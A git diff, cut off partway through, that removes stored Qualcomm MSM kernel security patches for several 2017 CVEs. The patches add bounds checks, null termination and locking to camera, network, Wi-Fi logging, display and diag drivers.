-From: Ravi kumar Koyyana <rkoyyana@codeaurora.org>
-Date: Tue, 11 Apr 2017 18:47:44 -0700
-Subject: msm: camera2: cpp: Fix out-of-bounds frame or command buffer access
-
-When user application provides invalid (out of range) stripe size and
-stripe indices, while submitting  requests for the stripe based image
-processing by the CPP kernel driver, the driver could  perform out of
-bounds access of the internal buffers.
-
-This fix ensures that stripe size and indices of frame/command buffer
-are properly validated during the configuration and before processing
-such requests through the CPP hardware block.
-
-CRs-fixed: 2002207
-Change-Id: Ib79e36fb507d8e75d8fc28afb990020a0e1bf845
-Signed-off-by: Ravi kumar Koyyana <rkoyyana@codeaurora.org>
----
- .../platform/msm/camera_v2/pproc/cpp/msm_cpp.c     | 33 ++++++++++++++++++----
- 1 file changed, 27 insertions(+), 6 deletions(-)
-
-diff --git a/drivers/media/platform/msm/camera_v2/pproc/cpp/msm_cpp.c b/drivers/media/platform/msm/camera_v2/pproc/cpp/msm_cpp.c
-index 79a8e8e..8269dc7 100644
---- a/drivers/media/platform/msm/camera_v2/pproc/cpp/msm_cpp.c
-+++ b/drivers/media/platform/msm/camera_v2/pproc/cpp/msm_cpp.c
-@@ -2281,9 +2281,29 @@ static int msm_cpp_cfg_frame(struct cpp_device *cpp_dev,
- 		return -EINVAL;
- 	}
- 
--	if (stripe_base == UINT_MAX || new_frame->num_strips >
--		(UINT_MAX - 1 - stripe_base) / stripe_size) {
--		pr_err("Invalid frame message,num_strips %d is large\n",
-+	/* Stripe index starts at zero */
-+	if ((!new_frame->num_strips) ||
-+		(new_frame->first_stripe_index >= new_frame->num_strips) ||
-+		(new_frame->last_stripe_index  >= new_frame->num_strips) ||
-+		(new_frame->first_stripe_index >
-+			new_frame->last_stripe_index)) {
-+		pr_err("Invalid frame message, #stripes=%d, stripe indices=[%d,%d]\n",
-+			new_frame->num_strips,
-+			new_frame->first_stripe_index,
-+			new_frame->last_stripe_index);
-+		return -EINVAL;
-+	}
-+
-+	if (!stripe_size) {
-+		pr_err("Invalid frame message, invalid stripe_size (%d)!\n",
-+			stripe_size);
-+		return -EINVAL;
-+	}
-+
-+	if ((stripe_base == UINT_MAX) ||
-+		(new_frame->num_strips >
-+			(UINT_MAX - 1 - stripe_base) / stripe_size)) {
-+		pr_err("Invalid frame message, num_strips %d is large\n",
- 			new_frame->num_strips);
- 		return -EINVAL;
- 	}
-@@ -2523,13 +2543,14 @@ static int msm_cpp_cfg(struct cpp_device *cpp_dev,
- 	struct msm_cpp_frame_info_t *frame = NULL;
- 	struct msm_cpp_frame_info_t k_frame_info;
- 	int32_t rc = 0;
--	int32_t i = 0;
--	int32_t num_buff = sizeof(k_frame_info.output_buffer_info)/
-+	uint32_t i = 0;
-+	uint32_t num_buff = sizeof(k_frame_info.output_buffer_info) /
- 		sizeof(struct msm_cpp_buffer_info_t);
-+
- 	if (copy_from_user(&k_frame_info,
- 			(void __user *)ioctl_ptr->ioctl_ptr,
- 			sizeof(k_frame_info)))
--			return -EFAULT;
-+		return -EFAULT;
- 
- 	frame = msm_cpp_get_frame(ioctl_ptr);
- 	if (!frame) {
--- 
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2017-8268/4.4/0002.patch b/Patches/Linux_CVEs/CVE-2017-8268/4.4/0002.patch
deleted file mode 100644
index dc7ee887..00000000
--- a/Patches/Linux_CVEs/CVE-2017-8268/4.4/0002.patch
+++ /dev/null
@@ -1,79 +0,0 @@
-From fab64410d005a7dee8ed02557a0ca26e4c5242ff Mon Sep 17 00:00:00 2001
-From: Ravi kumar Koyyana <rkoyyana@codeaurora.org>
-Date: Tue, 11 Apr 2017 18:47:44 -0700
-Subject: msm: camera2: cpp: Fix out-of-bounds frame or command buffer access
-
-When user application provides invalid (out of range) stripe size and
-stripe indices, while submitting  requests for the stripe based image
-processing by the CPP kernel driver, the driver could  perform out of
-bounds access of the internal buffers.
-
-This fix ensures that stripe size and indices of frame/command buffer
-are properly validated during the configuration and before processing
-such requests through the CPP hardware block.
-
-CRs-fixed: 2002207
-Change-Id: Ib79e36fb507d8e75d8fc28afb990020a0e1bf845
-Signed-off-by: Ravi kumar Koyyana <rkoyyana@codeaurora.org>
----
- .../platform/msm/camera_v2/pproc/cpp/msm_cpp.c     | 33 ++++++++++++++++++----
- 1 file changed, 27 insertions(+), 6 deletions(-)
-
-diff --git a/drivers/media/platform/msm/camera_v2/pproc/cpp/msm_cpp.c b/drivers/media/platform/msm/camera_v2/pproc/cpp/msm_cpp.c
-index 95aac07..b7feb12 100644
---- a/drivers/media/platform/msm/camera_v2/pproc/cpp/msm_cpp.c
-+++ b/drivers/media/platform/msm/camera_v2/pproc/cpp/msm_cpp.c
-@@ -2542,9 +2542,29 @@ static int msm_cpp_cfg_frame(struct cpp_device *cpp_dev,
- 		return -EINVAL;
- 	}
- 
--	if (stripe_base == UINT_MAX || new_frame->num_strips >
--		(UINT_MAX - 1 - stripe_base) / stripe_size) {
--		pr_err("Invalid frame message,num_strips %d is large\n",
-+	/* Stripe index starts at zero */
-+	if ((!new_frame->num_strips) ||
-+		(new_frame->first_stripe_index >= new_frame->num_strips) ||
-+		(new_frame->last_stripe_index  >= new_frame->num_strips) ||
-+		(new_frame->first_stripe_index >
-+			new_frame->last_stripe_index)) {
-+		pr_err("Invalid frame message, #stripes=%d, stripe indices=[%d,%d]\n",
-+			new_frame->num_strips,
-+			new_frame->first_stripe_index,
-+			new_frame->last_stripe_index);
-+		return -EINVAL;
-+	}
-+
-+	if (!stripe_size) {
-+		pr_err("Invalid frame message, invalid stripe_size (%d)!\n",
-+			stripe_size);
-+		return -EINVAL;
-+	}
-+
-+	if ((stripe_base == UINT_MAX) ||
-+		(new_frame->num_strips >
-+			(UINT_MAX - 1 - stripe_base) / stripe_size)) {
-+		pr_err("Invalid frame message, num_strips %d is large\n",
- 			new_frame->num_strips);
- 		return -EINVAL;
- 	}
-@@ -2785,13 +2805,14 @@ static int msm_cpp_cfg(struct cpp_device *cpp_dev,
- 	struct msm_cpp_frame_info_t *frame = NULL;
- 	struct msm_cpp_frame_info_t k_frame_info;
- 	int32_t rc = 0;
--	int32_t i = 0;
--	int32_t num_buff = sizeof(k_frame_info.output_buffer_info)/
-+	uint32_t i = 0;
-+	uint32_t num_buff = sizeof(k_frame_info.output_buffer_info) /
- 				sizeof(struct msm_cpp_buffer_info_t);
-+
- 	if (copy_from_user(&k_frame_info,
- 			(void __user *)ioctl_ptr->ioctl_ptr,
- 			sizeof(k_frame_info)))
--			return -EFAULT;
-+		return -EFAULT;
- 
- 	frame = msm_cpp_get_frame(ioctl_ptr);
- 	if (!frame) {
--- 
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2017-8269/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2017-8269/ANY/0001.patch
deleted file mode 100644
index 686acd01..00000000
--- a/Patches/Linux_CVEs/CVE-2017-8269/ANY/0001.patch
+++ /dev/null
@@ -1,38 +0,0 @@
-From b925d9f76164475abb6f6a557327095156c9b249 Mon Sep 17 00:00:00 2001
-From: Skylar Chang <chiaweic@codeaurora.org>
-Date: Fri, 14 Apr 2017 19:23:05 -0700
-Subject: msm: rmnet_ipa: fix security issue
-
-Fix the security issue where mux channel name might
-not be null-terminated in ipa wan driver.
-
-Change-Id: I3ef440b62cf3861464fb60c1e7f65f2be5e39ed0
-Acked-by: Shihuan Liu <shihuanl@qti.qualcomm.com>
-Signed-off-by: Skylar Chang <chiaweic@codeaurora.org>
----
- drivers/platform/msm/ipa/rmnet_ipa.c | 5 ++++-
- 1 file changed, 4 insertions(+), 1 deletion(-)
-
-diff --git a/drivers/platform/msm/ipa/rmnet_ipa.c b/drivers/platform/msm/ipa/rmnet_ipa.c
-index 3f073f2..a2c838b 100644
---- a/drivers/platform/msm/ipa/rmnet_ipa.c
-+++ b/drivers/platform/msm/ipa/rmnet_ipa.c
-@@ -1,4 +1,4 @@
--/* Copyright (c) 2014, The Linux Foundation. All rights reserved.
-+/* Copyright (c) 2017, The Linux Foundation. All rights reserved.
-  *
-  * This program is free software; you can redistribute it and/or modify
-  * it under the terms of the GNU General Public License version 2 and
-@@ -1236,6 +1236,9 @@ static int ipa_wwan_ioctl(struct net_device *dev, struct ifreq *ifr, int cmd)
- 			memcpy(mux_channel[rmnet_index].vchannel_name,
- 				extend_ioctl_data.u.rmnet_mux_val.vchannel_name,
- 				sizeof(mux_channel[rmnet_index].vchannel_name));
-+			mux_channel[rmnet_index].vchannel_name[
-+				IFNAMSIZ - 1] = '\0';
-+
- 			IPAWANDBG("cashe device[%s:%d] in IPA_wan[%d]\n",
- 				mux_channel[rmnet_index].vchannel_name,
- 				mux_channel[rmnet_index].mux_id,
--- 
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2017-8270/qcacld-3.0/0001.patch b/Patches/Linux_CVEs/CVE-2017-8270/qcacld-3.0/0001.patch
deleted file mode 100644
index 2824db06..00000000
--- a/Patches/Linux_CVEs/CVE-2017-8270/qcacld-3.0/0001.patch
+++ /dev/null
@@ -1,204 +0,0 @@
-From ff96565f1dbabfeb7fb2c1604f40af768579d9df Mon Sep 17 00:00:00 2001
-From: Ashish Kumar Dhanotiya <adhanoti@codeaurora.org>
-Date: Fri, 14 Apr 2017 16:55:34 +0530
-Subject: qcacld-3.0: Race condition while using pkt log buffer
-
-There can be a race condition if two different threads use the
-pkt log buffer at the same time. This issue can lead to Use-After-Free
-of the packet log buffer.
-
-To address this issue, protect the pktlog buffer access using spinlock.
-
-Change-Id: I8098bb78a8e2462e109cee3407683c669f151fd5
-CRs-Fixed: 2021363
----
- core/utils/pktlog/linux_ac.c  | 31 +++++++++++++++++++++++++------
- core/utils/pktlog/pktlog_ac.c |  5 +++++
- 2 files changed, 30 insertions(+), 6 deletions(-)
-
-diff --git a/core/utils/pktlog/linux_ac.c b/core/utils/pktlog/linux_ac.c
-index 974cd2a..eb0943f 100644
---- a/core/utils/pktlog/linux_ac.c
-+++ b/core/utils/pktlog/linux_ac.c
-@@ -520,12 +520,15 @@ static void pktlog_detach(struct hif_opaque_softc *scn)
- 	pl_info = pl_dev->pl_info;
- 	remove_proc_entry(WLANDEV_BASENAME, g_pktlog_pde);
- 	pktlog_sysctl_unregister(pl_dev);
--	pktlog_cleanup(pl_info);
-+
-+	spin_lock_bh(&pl_info->log_lock);
- 
- 	if (pl_info->buf) {
- 		pktlog_release_buf(scn);
- 		pl_dev->tgt_pktlog_alloced = false;
- 	}
-+	spin_unlock_bh(&pl_info->log_lock);
-+	pktlog_cleanup(pl_info);
- 
- 	if (pl_dev) {
- 		kfree(pl_info);
-@@ -701,11 +704,16 @@ pktlog_read_proc_entry(char *buf, size_t nbytes, loff_t *ppos,
- 	int rem_len;
- 	int start_offset, end_offset;
- 	int fold_offset, ppos_data, cur_rd_offset, cur_wr_offset;
--	struct ath_pktlog_buf *log_buf = pl_info->buf;
-+	struct ath_pktlog_buf *log_buf;
-+
-+	spin_lock_bh(&pl_info->log_lock);
-+	log_buf = pl_info->buf;
-+
- 	*read_complete = false;
- 
- 	if (log_buf == NULL) {
- 		*read_complete = true;
-+		spin_unlock_bh(&pl_info->log_lock);
- 		return 0;
- 	}
- 
-@@ -808,7 +816,6 @@ rd_done:
- 	*ppos += ret_val;
- 
- 	if (ret_val == 0) {
--		PKTLOG_LOCK(pl_info);
- 		/* Write pointer might have been updated during the read.
- 		 * So, if some data is written into, lets not reset the pointers
- 		 * We can continue to read from the offset position
-@@ -822,9 +829,8 @@ rd_done:
- 			pl_info->buf->offset = PKTLOG_READ_OFFSET;
- 			*read_complete = true;
- 		}
--		PKTLOG_UNLOCK(pl_info);
- 	}
--
-+	spin_unlock_bh(&pl_info->log_lock);
- 	return ret_val;
- }
- 
-@@ -849,16 +855,20 @@ __pktlog_read(struct file *file, char *buf, size_t nbytes, loff_t *ppos)
- 	if (!pl_info)
- 		return 0;
- 
-+	spin_lock_bh(&pl_info->log_lock);
- 	log_buf = pl_info->buf;
- 
--	if (log_buf == NULL)
-+	if (log_buf == NULL) {
-+		spin_unlock_bh(&pl_info->log_lock);
- 		return 0;
-+	}
- 
- 	if (pl_info->log_state) {
- 		/* Read is not allowed when write is going on
- 		 * When issuing cat command, ensure to send
- 		 * pktlog disable command first.
- 		 */
-+		spin_unlock_bh(&pl_info->log_lock);
- 		return -EINVAL;
- 	}
- 
-@@ -875,11 +885,13 @@ __pktlog_read(struct file *file, char *buf, size_t nbytes, loff_t *ppos)
- 
- 	if (*ppos < bufhdr_size) {
- 		count = QDF_MIN((bufhdr_size - *ppos), rem_len);
-+		spin_unlock_bh(&pl_info->log_lock);
- 		if (copy_to_user(buf, ((char *)&log_buf->bufhdr) + *ppos,
- 				 count))
- 			return -EFAULT;
- 		rem_len -= count;
- 		ret_val += count;
-+		spin_lock_bh(&pl_info->log_lock);
- 	}
- 
- 	start_offset = log_buf->rd_offset;
-@@ -921,19 +933,23 @@ __pktlog_read(struct file *file, char *buf, size_t nbytes, loff_t *ppos)
- 			goto rd_done;
- 
- 		count = QDF_MIN(rem_len, (end_offset - ppos_data + 1));
-+		spin_unlock_bh(&pl_info->log_lock);
- 		if (copy_to_user(buf + ret_val,
- 				 log_buf->log_data + ppos_data, count))
- 			return -EFAULT;
- 		ret_val += count;
- 		rem_len -= count;
-+		spin_lock_bh(&pl_info->log_lock);
- 	} else {
- 		if (ppos_data <= fold_offset) {
- 			count = QDF_MIN(rem_len, (fold_offset - ppos_data + 1));
-+			spin_unlock_bh(&pl_info->log_lock);
- 			if (copy_to_user(buf + ret_val,
- 					 log_buf->log_data + ppos_data, count))
- 				return -EFAULT;
- 			ret_val += count;
- 			rem_len -= count;
-+			spin_lock_bh(&pl_info->log_lock);
- 		}
- 
- 		if (rem_len == 0)
-@@ -945,11 +961,13 @@ __pktlog_read(struct file *file, char *buf, size_t nbytes, loff_t *ppos)
- 
- 		if (ppos_data <= end_offset) {
- 			count = QDF_MIN(rem_len, (end_offset - ppos_data + 1));
-+			spin_unlock_bh(&pl_info->log_lock);
- 			if (copy_to_user(buf + ret_val,
- 					 log_buf->log_data + ppos_data, count))
- 				return -EFAULT;
- 			ret_val += count;
- 			rem_len -= count;
-+			spin_lock_bh(&pl_info->log_lock);
- 		}
- 	}
- 
-@@ -960,6 +978,7 @@ rd_done:
- 	}
- 	*ppos += ret_val;
- 
-+	spin_unlock_bh(&pl_info->log_lock);
- 	return ret_val;
- }
- 
-diff --git a/core/utils/pktlog/pktlog_ac.c b/core/utils/pktlog/pktlog_ac.c
-index ab0be7c..524591b 100644
---- a/core/utils/pktlog/pktlog_ac.c
-+++ b/core/utils/pktlog/pktlog_ac.c
-@@ -457,6 +457,7 @@ int pktlog_enable(struct hif_opaque_softc *scn, int32_t log_state,
- 
- 		}
- 
-+		spin_lock_bh(&pl_info->log_lock);
- 		pl_info->buf->bufhdr.version = CUR_PKTLOG_VER;
- 		pl_info->buf->bufhdr.magic_num = PKTLOG_MAGIC_NUM;
- 		pl_info->buf->wr_offset = 0;
-@@ -465,6 +466,7 @@ int pktlog_enable(struct hif_opaque_softc *scn, int32_t log_state,
- 		pl_info->buf->bytes_written = 0;
- 		pl_info->buf->msg_index = 1;
- 		pl_info->buf->offset = PKTLOG_READ_OFFSET;
-+		spin_unlock_bh(&pl_info->log_lock);
- 
- 		pl_info->start_time_thruput = os_get_timestamp();
- 		pl_info->start_time_per = pl_info->start_time_thruput;
-@@ -542,12 +544,14 @@ int pktlog_setsize(struct hif_opaque_softc *scn, int32_t size)
- 		return -EINVAL;
- 	}
- 
-+	spin_lock_bh(&pl_info->log_lock);
- 	if (pl_info->buf != NULL) {
- 		if (pl_dev->is_pktlog_cb_subscribed &&
- 			wdi_pktlog_unsubscribe(pdev_txrx_handle,
- 					 pl_info->log_state)) {
- 			pl_info->curr_pkt_state = PKTLOG_OPR_NOT_IN_PROGRESS;
- 			printk("Cannot unsubscribe pktlog from the WDI\n");
-+			spin_unlock_bh(&pl_info->log_lock);
- 			return -EFAULT;
- 		}
- 		pktlog_release_buf(scn);
-@@ -560,6 +564,7 @@ int pktlog_setsize(struct hif_opaque_softc *scn, int32_t size)
- 		pl_info->buf_size = size;
- 	}
- 	pl_info->curr_pkt_state = PKTLOG_OPR_NOT_IN_PROGRESS;
-+	spin_unlock_bh(&pl_info->log_lock);
- 	return 0;
- }
- 
--- 
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2017-8272/4.4/0001.patch b/Patches/Linux_CVEs/CVE-2017-8272/4.4/0001.patch
deleted file mode 100644
index e83bab49..00000000
--- a/Patches/Linux_CVEs/CVE-2017-8272/4.4/0001.patch
+++ /dev/null
@@ -1,60 +0,0 @@
-From a8cb976e7c8f25191728b655e0b38328a6d7d81f Mon Sep 17 00:00:00 2001
-From: Benjamin Chan <bkchan@codeaurora.org>
-Date: Wed, 19 Apr 2017 16:24:40 -0400
-Subject: msm: mdss: Add plane_count range check in mdss WFD
-
-For any given output buffer to the MDSS WFD, it is necessary to check
-the range of the plane_count against the MAX_PLANES definition, in order
-to avoid any out of bound access.
-
-CRs-Fixed: 2028702
-Change-Id: I4f1497a3a2e4ca2d30fc268e68cfdacc0d8539ea
-Signed-off-by: Benjamin Chan <bkchan@codeaurora.org>
----
- drivers/video/fbdev/msm/mdss_mdp_layer.c | 6 ++++++
- drivers/video/fbdev/msm/mdss_mdp_wfd.c   | 8 +++++++-
- 2 files changed, 13 insertions(+), 1 deletion(-)
-
-diff --git a/drivers/video/fbdev/msm/mdss_mdp_layer.c b/drivers/video/fbdev/msm/mdss_mdp_layer.c
-index 09a3422..5e96a08 100644
---- a/drivers/video/fbdev/msm/mdss_mdp_layer.c
-+++ b/drivers/video/fbdev/msm/mdss_mdp_layer.c
-@@ -3035,6 +3035,12 @@ int mdss_mdp_layer_pre_commit_wfd(struct msm_fb_data_type *mfd,
- 		wfd = mdp5_data->wfd;
- 		output_layer = commit->output_layer;
- 
-+		if (output_layer->buffer.plane_count > MAX_PLANES) {
-+			pr_err("Output buffer plane_count exceeds MAX_PLANES limit:%d\n",
-+					output_layer->buffer.plane_count);
-+			return -EINVAL;
-+		}
-+
- 		data = mdss_mdp_wfd_add_data(wfd, output_layer);
- 		if (IS_ERR_OR_NULL(data))
- 			return PTR_ERR(data);
-diff --git a/drivers/video/fbdev/msm/mdss_mdp_wfd.c b/drivers/video/fbdev/msm/mdss_mdp_wfd.c
-index 71a07f6..7868dc0 100644
---- a/drivers/video/fbdev/msm/mdss_mdp_wfd.c
-+++ b/drivers/video/fbdev/msm/mdss_mdp_wfd.c
-@@ -1,4 +1,4 @@
--/* Copyright (c) 2015-2016, The Linux Foundation. All rights reserved.
-+/* Copyright (c) 2015-2017, The Linux Foundation. All rights reserved.
-  *
-  * This program is free software; you can redistribute it and/or modify
-  * it under the terms of the GNU General Public License version 2 and
-@@ -322,6 +322,12 @@ int mdss_mdp_wb_import_data(struct device *device,
- 	if (wfd_data->layer.flags & MDP_LAYER_SECURE_SESSION)
- 		flags = MDP_SECURE_OVERLAY_SESSION;
- 
-+	if (buffer->plane_count > MAX_PLANES) {
-+		pr_err("buffer plane_count exceeds MAX_PLANES limit:%d",
-+				buffer->plane_count);
-+		return -EINVAL;
-+	}
-+
- 	memset(planes, 0, sizeof(planes));
- 
- 	for (i = 0; i < buffer->plane_count; i++) {
--- 
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2017-8277/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2017-8277/ANY/0001.patch
deleted file mode 100644
index aba95594..00000000
--- a/Patches/Linux_CVEs/CVE-2017-8277/ANY/0001.patch
+++ /dev/null
@@ -1,43 +0,0 @@
-From c9a6f09f1030cec591df837622cb54bbb2d24ddc Mon Sep 17 00:00:00 2001
-From: Sandeep Panda <spanda@codeaurora.org>
-Date: Fri, 12 May 2017 10:56:32 +0530
-Subject: msm: mdss: remove client from device list if failed to register
-
-If there is any failure while registering a DBA client with MDSS
-driver, then remove the client from device client list first and
-then free the client. Otherwise driver might crash when
-traversing the device client list in later stage, because of an
-uninitialized entry in the list.
-
-Change-Id: I60666f4c3dea5c7ea7b7c77bcb14b080ee25b54d
-Signed-off-by: Sandeep Panda <spanda@codeaurora.org>
----
- drivers/video/fbdev/msm/msm_dba/msm_dba.c | 7 ++++++-
- 1 file changed, 6 insertions(+), 1 deletion(-)
-
-diff --git a/drivers/video/fbdev/msm/msm_dba/msm_dba.c b/drivers/video/fbdev/msm/msm_dba/msm_dba.c
-index 7a5c9d9..cc6512a 100644
---- a/drivers/video/fbdev/msm/msm_dba/msm_dba.c
-+++ b/drivers/video/fbdev/msm/msm_dba/msm_dba.c
-@@ -1,5 +1,5 @@
- /*
-- * Copyright (c) 2015, The Linux Foundation. All rights reserved.
-+ * Copyright (c) 2015,2017, The Linux Foundation. All rights reserved.
-  *
-  * This program is free software; you can redistribute it and/or modify
-  * it under the terms of the GNU General Public License version 2 and
-@@ -80,6 +80,11 @@ void *msm_dba_register_client(struct msm_dba_reg_info *info,
- 		if (rc) {
- 			pr_err("%s: Client register failed (%s, %d)\n",
- 			       __func__, info->chip_name, info->instance_id);
-+			/* remove the client from list before freeing */
-+			mutex_lock_nested(&device->dev_mutex,
-+						SINGLE_DEPTH_NESTING);
-+			list_del(&client->list);
-+			mutex_unlock(&device->dev_mutex);
- 			kfree(client);
- 			mutex_unlock(&register_mutex);
- 			return ERR_PTR(rc);
--- 
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2017-8279/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2017-8279/ANY/0001.patch
deleted file mode 100644
index 32cedec5..00000000
--- a/Patches/Linux_CVEs/CVE-2017-8279/ANY/0001.patch
+++ /dev/null
@@ -1,388 +0,0 @@
-From f09aee50c2ee6b79d94cb42eafc82413968b15cb Mon Sep 17 00:00:00 2001
-From: Gopikrishna Mogasati <gmogas@codeaurora.org>
-Date: Fri, 5 May 2017 16:04:35 +0530
-Subject: diag: Add proper synchronization checks to msg mask table
-
-This fix removes dependency between real time message mask
-table and build time message mask table. Also this fix
-synchronizes retrieval and modification of real time message
-mask table.
-
-CRs-Fixed: 2015227
-Change-Id: Id0a0964337ec4645d7061fc35120dfa061a990ff
-Signed-off-by: Gopikrishna Mogasati <gmogas@codeaurora.org>
----
- drivers/char/diag/diag_masks.c    | 65 +++++++++++++++++++++++----------------
- drivers/char/diag/diagchar.h      |  2 ++
- drivers/char/diag/diagchar_core.c |  1 +
- drivers/char/diag/diagfwd_cntl.c  | 11 ++++---
- 4 files changed, 49 insertions(+), 30 deletions(-)
-
-diff --git a/drivers/char/diag/diag_masks.c b/drivers/char/diag/diag_masks.c
-index 3c10462..382717b 100644
---- a/drivers/char/diag/diag_masks.c
-+++ b/drivers/char/diag/diag_masks.c
-@@ -309,10 +309,12 @@ static void diag_send_msg_mask_update(uint8_t peripheral, int first, int last)
- 
- 	if (!mask_info || !mask_info->ptr || !mask_info->update_buf)
- 		return;
--
-+	mutex_lock(&driver->msg_mask_lock);
- 	mask = (struct diag_msg_mask_t *)mask_info->ptr;
--	if (!mask->ptr)
-+	if (!mask->ptr) {
-+		mutex_unlock(&driver->msg_mask_lock);
- 		return;
-+	}
- 	buf = mask_info->update_buf;
- 	mutex_lock(&mask_info->lock);
- 	switch (mask_info->status) {
-@@ -385,6 +387,7 @@ proceed:
- 	}
- err:
- 	mutex_unlock(&mask_info->lock);
-+	mutex_unlock(&driver->msg_mask_lock);
- }
- 
- static void diag_send_time_sync_update(uint8_t peripheral)
-@@ -506,7 +509,7 @@ static int diag_cmd_get_ssid_range(unsigned char *src_buf, int src_len,
- 
- 	if (!diag_apps_responds())
- 		return 0;
--
-+	mutex_lock(&driver->msg_mask_lock);
- 	rsp.cmd_code = DIAG_CMD_MSG_CONFIG;
- 	rsp.sub_cmd = DIAG_CMD_OP_GET_SSID_RANGE;
- 	rsp.status = MSG_STATUS_SUCCESS;
-@@ -514,7 +517,6 @@ static int diag_cmd_get_ssid_range(unsigned char *src_buf, int src_len,
- 	rsp.count = driver->msg_mask_tbl_count;
- 	memcpy(dest_buf, &rsp, sizeof(rsp));
- 	write_len += sizeof(rsp);
--
- 	mask_ptr = (struct diag_msg_mask_t *)mask_info->ptr;
- 	for (i = 0; i <  driver->msg_mask_tbl_count; i++, mask_ptr++) {
- 		if (write_len + sizeof(ssid_range) > dest_len) {
-@@ -527,7 +529,7 @@ static int diag_cmd_get_ssid_range(unsigned char *src_buf, int src_len,
- 		memcpy(dest_buf + write_len, &ssid_range, sizeof(ssid_range));
- 		write_len += sizeof(ssid_range);
- 	}
--
-+	mutex_unlock(&driver->msg_mask_lock);
- 	return write_len;
- }
- 
-@@ -551,7 +553,7 @@ static int diag_cmd_get_build_mask(unsigned char *src_buf, int src_len,
- 
- 	if (!diag_apps_responds())
- 		return 0;
--
-+	mutex_lock(&driver->msg_mask_lock);
- 	req = (struct diag_build_mask_req_t *)src_buf;
- 	rsp.cmd_code = DIAG_CMD_MSG_CONFIG;
- 	rsp.sub_cmd = DIAG_CMD_OP_GET_BUILD_MASK;
-@@ -559,9 +561,8 @@ static int diag_cmd_get_build_mask(unsigned char *src_buf, int src_len,
- 	rsp.ssid_last = req->ssid_last;
- 	rsp.status = MSG_STATUS_FAIL;
- 	rsp.padding = 0;
--
- 	build_mask = (struct diag_msg_mask_t *)msg_bt_mask.ptr;
--	for (i = 0; i < driver->msg_mask_tbl_count; i++, build_mask++) {
-+	for (i = 0; i < driver->bt_msg_mask_tbl_count; i++, build_mask++) {
- 		if (build_mask->ssid_first != req->ssid_first)
- 			continue;
- 		num_entries = req->ssid_last - req->ssid_first + 1;
-@@ -582,7 +583,7 @@ static int diag_cmd_get_build_mask(unsigned char *src_buf, int src_len,
- 	}
- 	memcpy(dest_buf, &rsp, sizeof(rsp));
- 	write_len += sizeof(rsp);
--
-+	mutex_unlock(&driver->msg_mask_lock);
- 	return write_len;
- }
- 
-@@ -610,6 +611,7 @@ static int diag_cmd_get_msg_mask(unsigned char *src_buf, int src_len,
- 	if (!diag_apps_responds())
- 		return 0;
- 
-+	mutex_lock(&driver->msg_mask_lock);
- 	req = (struct diag_build_mask_req_t *)src_buf;
- 	rsp.cmd_code = DIAG_CMD_MSG_CONFIG;
- 	rsp.sub_cmd = DIAG_CMD_OP_GET_MSG_MASK;
-@@ -617,7 +619,6 @@ static int diag_cmd_get_msg_mask(unsigned char *src_buf, int src_len,
- 	rsp.ssid_last = req->ssid_last;
- 	rsp.status = MSG_STATUS_FAIL;
- 	rsp.padding = 0;
--
- 	mask = (struct diag_msg_mask_t *)mask_info->ptr;
- 	for (i = 0; i < driver->msg_mask_tbl_count; i++, mask++) {
- 		if ((req->ssid_first < mask->ssid_first) ||
-@@ -635,7 +636,7 @@ static int diag_cmd_get_msg_mask(unsigned char *src_buf, int src_len,
- 	}
- 	memcpy(dest_buf, &rsp, sizeof(rsp));
- 	write_len += sizeof(rsp);
--
-+	mutex_unlock(&driver->msg_mask_lock);
- 	return write_len;
- }
- 
-@@ -666,7 +667,7 @@ static int diag_cmd_set_msg_mask(unsigned char *src_buf, int src_len,
- 	}
- 
- 	req = (struct diag_msg_build_mask_t *)src_buf;
--
-+	mutex_lock(&driver->msg_mask_lock);
- 	mutex_lock(&mask_info->lock);
- 	mask = (struct diag_msg_mask_t *)mask_info->ptr;
- 	for (i = 0; i < driver->msg_mask_tbl_count; i++, mask++) {
-@@ -726,7 +727,7 @@ static int diag_cmd_set_msg_mask(unsigned char *src_buf, int src_len,
- 		break;
- 	}
- 	mutex_unlock(&mask_info->lock);
--
-+	mutex_unlock(&driver->msg_mask_lock);
- 	if (diag_check_update(APPS_DATA))
- 		diag_update_userspace_clients(MSG_MASKS_TYPE);
- 
-@@ -779,7 +780,7 @@ static int diag_cmd_set_all_msg_mask(unsigned char *src_buf, int src_len,
- 	}
- 
- 	req = (struct diag_msg_config_rsp_t *)src_buf;
--
-+	mutex_lock(&driver->msg_mask_lock);
- 	mask = (struct diag_msg_mask_t *)mask_info->ptr;
- 	mutex_lock(&mask_info->lock);
- 	mask_info->status = (req->rt_mask) ? DIAG_CTRL_MASK_ALL_ENABLED :
-@@ -791,6 +792,7 @@ static int diag_cmd_set_all_msg_mask(unsigned char *src_buf, int src_len,
- 		mutex_unlock(&mask->lock);
- 	}
- 	mutex_unlock(&mask_info->lock);
-+	mutex_unlock(&driver->msg_mask_lock);
- 
- 	if (diag_check_update(APPS_DATA))
- 		diag_update_userspace_clients(MSG_MASKS_TYPE);
-@@ -1294,6 +1296,7 @@ static int diag_create_msg_mask_table(void)
- 	struct diag_msg_mask_t *mask = (struct diag_msg_mask_t *)msg_mask.ptr;
- 	struct diag_ssid_range_t range;
- 
-+	mutex_lock(&driver->msg_mask_lock);
- 	mutex_lock(&msg_mask.lock);
- 	driver->msg_mask_tbl_count = MSG_MASK_TBL_CNT;
- 	for (i = 0; i < driver->msg_mask_tbl_count; i++, mask++) {
-@@ -1304,6 +1307,7 @@ static int diag_create_msg_mask_table(void)
- 			break;
- 	}
- 	mutex_unlock(&msg_mask.lock);
-+	mutex_unlock(&driver->msg_mask_lock);
- 	return err;
- }
- 
-@@ -1316,9 +1320,11 @@ static int diag_create_build_time_mask(void)
- 	struct diag_msg_mask_t *build_mask = NULL;
- 	struct diag_ssid_range_t range;
- 
-+	mutex_lock(&driver->msg_mask_lock);
- 	mutex_lock(&msg_bt_mask.lock);
-+	driver->bt_msg_mask_tbl_count = MSG_MASK_TBL_CNT;
- 	build_mask = (struct diag_msg_mask_t *)msg_bt_mask.ptr;
--	for (i = 0; i < driver->msg_mask_tbl_count; i++, build_mask++) {
